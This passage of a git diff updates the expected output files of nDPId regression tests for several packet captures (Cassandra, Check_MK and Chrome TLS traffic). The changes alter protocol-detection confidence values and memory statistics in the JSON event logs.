-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","packets-captured":286,"packets-processed":286,"total-skipped-flows":0,"total-l4-payload-len":107108,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1450889698077} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 286/286 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878797 bytes -~~ total memory freed........: 5878797 bytes -~~ total allocations/frees...: 118404/118404 +~~ total memory allocated....: 6012431 bytes +~~ total memory freed........: 6012431 bytes +~~ total allocations/frees...: 121166/121166 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 693 chars diff --git a/test/results/check_mk_new.pcap.out b/test/results/check_mk_new.pcap.out index 87782a18d..4fba557ff 100644 --- a/test/results/check_mk_new.pcap.out +++ b/test/results/check_mk_new.pcap.out @@ -4,8 +4,8 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1512031663734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA8gwhAAEAGbgrAqGQWwKhkMuZ2GZzVcug3AAAAAKACchA4TQAAAgQFtAQCCAorDGs\/AAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1512031663734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"8soKyPpERjIA9qTsCABFAAA8AABAAEAG8SLAqGQywKhkFhmc5nZuqQJN1XLoOKAScSBJyAAAAgQFtAQCCAoWUVydKwxrPwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1512031663734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA0gwlAAEAGbhHAqGQWwKhkMuZ2GZzVcug4bqkCToAQAOVJwAAAAQEICisMaz8WUVyd"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} -00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","packets-captured":98,"packets-processed":98,"total-skipped-flows":0,"total-l4-payload-len":13758,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1512031663775} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 98/98 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872285 bytes -~~ total memory freed........: 5872285 bytes -~~ total allocations/frees...: 118212/118212 +~~ total memory allocated....: 6005919 bytes +~~ total memory freed........: 6005919 bytes +~~ total allocations/frees...: 120974/120974 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 705 chars diff --git a/test/results/chrome.pcap.out b/test/results/chrome.pcap.out index c7c8af996..a485ddfca 100644 --- a/test/results/chrome.pcap.out +++ b/test/results/chrome.pcap.out @@ -4,14 +4,14 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620902507870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902507870,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuJAbsdWbUDAAAAALAC\/\/8TEgAAAgQFtAEDAwUBAQgKM3SSOAAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620902507899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902507899,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4lEvFS6HVm1BKAS\/og8HwAAAgQFrAQCCAo6mxVSM3SSOAEDAwc="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620902507899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902507899,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuJAbsdWbUERLxUu4AQECxZJAAAAQEICjN0klQ6mxVS"} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902508740,"flow_last_seen":1620902508740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902508740,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620902508740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902508740,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuKAbtgbcSnAAAAALAC\/\/+8\/wAAAgQFtAEDAwUBAQgKM3SVkQAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620902508769,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902508769,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4peZebaYG3EqKAS\/og23AAAAgQFrAQCCAo6mxi5M3SVkQEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620902508769,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902508769,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuKAbtgbcSoXmXm24AQECxT5gAAAQEICjN0lag6mxi5"} -00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509272,"flow_last_seen":1620902509272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509272,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620902509272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509272,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuYAbvjd2YSAAAAALAC\/\/+WlQAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509273,"flow_last_seen":1620902509273,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509273,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -28,20 +28,20 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuaAbt39JnGf4gLD4AQECwd3QAAAQEICjN0l5M6mxrM"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509303,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5sh1fPg5uH4xaAS\/oinwwAAAgQFrAQCCAo6mxrPM3SXewEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509303,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvubAbvm4fjFIdXz4YAQECzEywAAAQEICjN0l5Q6mxrP"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 